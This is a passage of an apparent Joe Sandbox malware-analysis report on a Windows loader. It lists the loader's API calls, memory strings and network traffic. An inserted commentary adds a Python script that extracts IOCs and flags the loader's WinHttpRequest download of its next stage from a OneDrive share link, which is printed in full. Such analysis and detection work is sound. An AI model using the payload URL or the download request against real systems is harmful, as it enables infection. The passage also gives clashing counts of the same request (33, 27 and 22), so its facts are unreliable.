        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_029458B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,31_2_029458B4
        Source: C:\Users\Public\alpha.exe Code function: 35_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,35_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 35_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,35_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 35_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,35_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 35_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,35_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 35_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,35_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exe Code function: 38_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,38_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exe Code function: 38_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,38_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exe Code function: 38_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,38_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exe Code function: 38_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,38_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exe Code function: 38_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,38_2_00007FF744F27B4C

        Networking

        Source: Malware configuration extractor URLs: https://onedrive.live.com/download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0
        Source: C:\Users\Public\Libraries\Ping_c.pif Code function: 31_2_0295CF48 InternetCheckConnectionA,31_2_0295CF48
        Source: Joe Sandbox View IP Address: 13.107.137.11
        Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
        Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: global traffic HTTP traffic detected (the identical request below is logged 33 times in this run):
            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
            Host: onedrive.live.com
        Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 occurrences)
        Source: global traffic HTTP traffic detected: 27 further copies of the same request, GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1 to Host: onedrive.live.com with User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
        Source: global trafficDNS traffic detected: DNS query: onedrive.live.com
        Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: 183.59.114.20.in-addr.arpa
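The network entries above are the most directly actionable part of this section: the loader fetches its next stage from a OneDrive share link using the default User-Agent of the WinHttp.WinHttpRequest COM object, and the sandbox saw the same GET repeated 22 times. The script below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling; it turns report lines of this shape into a deduplicated IOC summary and flags the WinHttpRequest-to-OneDrive download pattern. The sample input is copied from the report lines above (the report strips the CRLFs from the captured request, so the headers run together, which the parser has to undo); the function names, the `KNOWN_HEADERS` list and the flagging rule are my own assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Report lines copied from the analysis above. The 22-fold repetition of the
# GET mirrors what the sandbox recorded; the DNS lines follow as in the report.
HTTP_LINE = (
    "Source: global trafficHTTP traffic detected: GET /download?resid=1EA3E8EA0AAD572E%21216"
    "&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: "
    "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com"
)
REPORT_LINES = [HTTP_LINE] * 22 + [
    "Source: global trafficDNS traffic detected: DNS query: onedrive.live.com",
    "Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa",
    "Source: global trafficDNS traffic detected: DNS query: 183.59.114.20.in-addr.arpa",
]

# Header names the flattened request text is split on (assumed list; extend it
# when a report shows other headers, otherwise they are glued to the previous value).
KNOWN_HEADERS = ("Connection", "Accept", "User-Agent", "Host",
                 "Accept-Encoding", "Content-Length", "Content-Type")


@dataclass(frozen=True)
class HttpRequest:
    method: str
    target: str
    version: str
    headers: tuple  # ((name, value), ...): a tuple keeps the record hashable for Counter

    def header(self, name):
        return dict(self.headers).get(name, "")

    def query(self):
        """Decoded query parameters of the request target (first value of each)."""
        return {k: v[0] for k, v in parse_qs(urlsplit(self.target).query).items()}


def parse_http_line(line):
    """Turn one 'HTTP traffic detected' report line into an HttpRequest, or None."""
    m = re.search(r"HTTP traffic detected: (\S+) (\S+) (HTTP/\d\.\d)(.*)$", line)
    if not m:
        return None
    method, target, version, rest = m.groups()
    # Split the run-together headers at "<Name>: "; the capturing group makes
    # re.split keep the header names, so parts alternate name, value, name, value.
    parts = re.split(r"(" + "|".join(map(re.escape, KNOWN_HEADERS)) + r"): ", rest)
    headers = tuple((name, value.strip()) for name, value in zip(parts[1::2], parts[2::2]))
    return HttpRequest(method, target, version, headers)


def parse_dns_line(line):
    """Return the queried name from a 'DNS traffic detected' line, or None."""
    m = re.search(r"DNS query: (\S+)$", line)
    return m.group(1) if m else None


def is_winhttp_cloud_download(req):
    """The pattern this sample shows: the WinHttp.WinHttpRequest COM client
    (identified by its default User-Agent) pulling a /download?resid=... share
    link from onedrive.live.com. Assumed rule, tune it to your environment."""
    return (
        "WinHttp.WinHttpRequest" in req.header("User-Agent")
        and req.header("Host").endswith("onedrive.live.com")
        and req.target.startswith("/download?")
        and "resid" in req.query()
    )


def summarize(lines):
    """Collapse duplicate report lines into counts and extract the IOCs."""
    requests, dns = Counter(), []
    for line in lines:
        req = parse_http_line(line)
        if req:
            requests[req] += 1
            continue
        name = parse_dns_line(line)
        if name:
            dns.append(name)
    return {
        "requests": requests,
        "dns": dns,
        "reverse_lookups": [n for n in dns if n.endswith(".in-addr.arpa")],
        "flagged": [r for r in requests if is_winhttp_cloud_download(r)],
    }


if __name__ == "__main__":
    s = summarize(REPORT_LINES)
    for req, n in s["requests"].items():
        print(f"{n:3d}x {req.method} {req.header('Host')}{req.target}  UA={req.header('User-Agent')}")
    for req in s["flagged"]:
        print("flagged OneDrive download, share id / key:", req.query())
    print("DNS:", s["dns"], "reverse lookups:", s["reverse_lookups"])
```

The `resid`/`authkey` pair is the share identifier of the hosted payload and is a more durable IOC than the full URL, since the same share can be reached through other OneDrive front-end paths. The `in-addr.arpa` queries are the sandbox (or Windows itself) reverse-resolving the servers it talked to, not a second C2 channel, which is why the summary keeps them apart.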
        Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
        Source: xkn.exe, 00000011.00000002.1501921672.00000223D552B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: Ping_c.pif, Ping_c.pif, 0000001F.00000002.2707007653.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2708904655.0000000002940000.00000040.00001000.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2727734958.000000007FC40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
        Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
        Source: kn.exe, 00000009.00000002.1463535859.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1459705858.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000002.1516633974.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000015.00000000.1507474970.00007FF60806E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.7.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
        Source: Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.m
        Source: Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msauth.net/
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msftauth.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdn.msftauth.net/
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdnmsftuswe2.azureedge.net/
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://acctcdnvzeuno.azureedge.net/
        Source: xkn.exe, 00000011.00000002.1501921672.00000223D54B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: xkn.exe, 00000011.00000002.1501921672.00000223D54FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
        Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
        Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipv6.login.live.com
        Source: Ping_c.pif, 0000001F.00000003.2357978518.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnmsftuswe2.azureedge.ne
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnmsftuswe2.azureedge.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnmsftuswe2.azureedge.net/
        Source: Ping_c.pif, 0000001F.00000003.1882008954.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888765366.0000000027219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureed
        Source: Ping_c.pif, 0000001F.00000003.1859829424.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1853005680.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureedgL
        Source: Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureedge.net
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706588906.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357601274.00000000271E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lgincdnvzeuno.azureedge.net/
        Source: Ping_c.pif, 0000001F.00000002.2726741587.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2427549071.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
        Source: Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/#
        Source: Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/4
        Source: Ping_c.pif, 0000001F.00000003.1673627946.00000000007B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/:p
        Source: Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/H
        Source: Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/L
        Source: Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/s
        Source: Ping_c.pif, 0000001F.00000003.2555257376.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2587882016.00000000271F3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627478071.00000000271F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/w
        Source: Ping_c.pif, 0000001F.00000003.2019992136.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.000000002721C000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2048630262.0000000027215000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1859650606.00000000271F2000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921428842.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1706808669.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2080003619.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1793555694.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744338495.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1826526825.00000000271F1000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2144538741.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: Ping_c.pif, 0000001F.00000003.1673520794.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1634366147.00000000007E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: Ping_c.pif, 0000001F.00000003.1953069294.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1946086509.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/%
        Source: Ping_c.pif, 0000001F.00000003.2627952934.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2394138435.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2662272349.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2357978518.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/&
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/2
        Source: Ping_c.pif, 0000001F.00000003.2662272349.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/=
        Source: Ping_c.pif, 0000001F.00000002.2703452505.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/A
        Source: Ping_c.pif, 0000001F.00000003.2427549071.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/D
        Source: Ping_c.pif, 0000001F.00000003.1737745516.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1744390876.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2177670138.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921671898.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/R
        Source: Ping_c.pif, 0000001F.00000003.2627952934.00000000007CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RS
        Source: Ping_c.pif, 0000001F.00000003.1592651131.00000000007F6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1593066185.00000000007F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/US1
        Source: Ping_c.pif, 0000001F.00000003.2459802215.00000000007E3000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2588420742.00000000007E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/V
        Source: Ping_c.pif, 0000001F.00000003.2662272349.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2216274021.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2627952934.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2703452505.00000000007CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/Y
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/cC.5
        Source: Ping_c.pif, 0000001F.00000003.1706671192.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1673520794.00000000007F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/d
        Source: Ping_c.pif, 0000001F.00000003.2080225046.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2020192072.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2111822434.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/h
        Source: Ping_c.pif, 0000001F.00000003.1793555694.00000000271F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=1fadaa5e49104e979224c67aeaa4b7ae
        Source: Ping_c.pif, 0000001F.00000003.2048630262.000000002721C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=2c7589270b4343c0a3c59373b83e1dd4
        Source: Ping_c.pif, 0000001F.00000003.1706808669.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=41987e8c86dc4a1abab22e1963cceeb0
        Source: Ping_c.pif, 0000001F.00000003.2048630262.00000000271EF000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2144538741.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=515e3a4699634776859
        Source: Ping_c.pif, 0000001F.00000003.2012981796.00000000271ED000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.1921428842.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=515e3a46996347768593eabc11a147a6
        Source: Ping_c.pif, 0000001F.00000003.1888888570.00000000271EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=6f2dfc9db08748c2b8f9269f709c97cf
        Source: Ping_c.pif, 0000001F.00000003.1744338495.00000000271F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=74e8ee1068844c4d8dd2e039108300e1
        Source: Ping_c.pif, 0000001F.00000003.2080003619.0000000027219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=b118915afffd482fb79cf45eccde5291
        Source: Ping_c.pif, 0000001F.00000003.1826526825.00000000271F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=c26f9e12bbad471ca7b0a505d4336c44
        Source: Ping_c.pif, 0000001F.00000003.2048630262.0000000027215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=f8f700404dd
        Source: Ping_c.pif, 0000001F.00000003.2019992136.0000000027215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=f8f700404dd64de990b5afe28ef7290a
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/l
        Source: Ping_c.pif, 0000001F.00000003.2587882016.000000002721D000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555257376.0000000027219000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2523723266.000000002721F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/lo
        Source: Ping_c.pif, 0000001F.00000003.2555257376.0000000027236000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2555976408.0000000000798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=063690149B8E31AB&opid=16063D7ABF02962
        Source: Ping_c.pif, 0000001F.00000003.2662272349.0000000000798000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000002.2726741587.000000002723A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?id=250206&id=250206&contextid=0860495E926678A3&opid=450663BF1F5C0CE
